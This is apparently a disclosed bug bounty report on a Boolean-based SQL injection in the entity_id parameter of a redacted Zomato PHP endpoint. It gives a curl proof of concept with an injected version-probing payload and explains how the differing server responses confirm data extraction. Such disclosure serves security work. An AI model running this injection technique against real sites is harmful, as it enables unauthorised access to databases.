[www.zomato.com] Boolean SQLi - /█████.php

@gerben_javado found that the parameter entity_id was vulnerable to SQLi on endpoint /████.php using a Boolean technique. ##POC The POC uses `if(mid(@@version,1,1)=5` which returns a 200 ok message. If changed for `if(mid(@@version,1,1)=4` the server gives a 500 or 504 error, confirming the SQLi and proving data extraction. ``` curl -H 'Host: www.zomato.com' -H 'Cookie: PHPSESSID=XXXXX' 'https://www.zomato.com/████.php?entity_type=restaurant&entity_id=1+or+if(mid(@@version,1,1)=5,1,2)=2%23' -k ``` Thanks @gerben_javado for helping us in keeping @zomato secure :)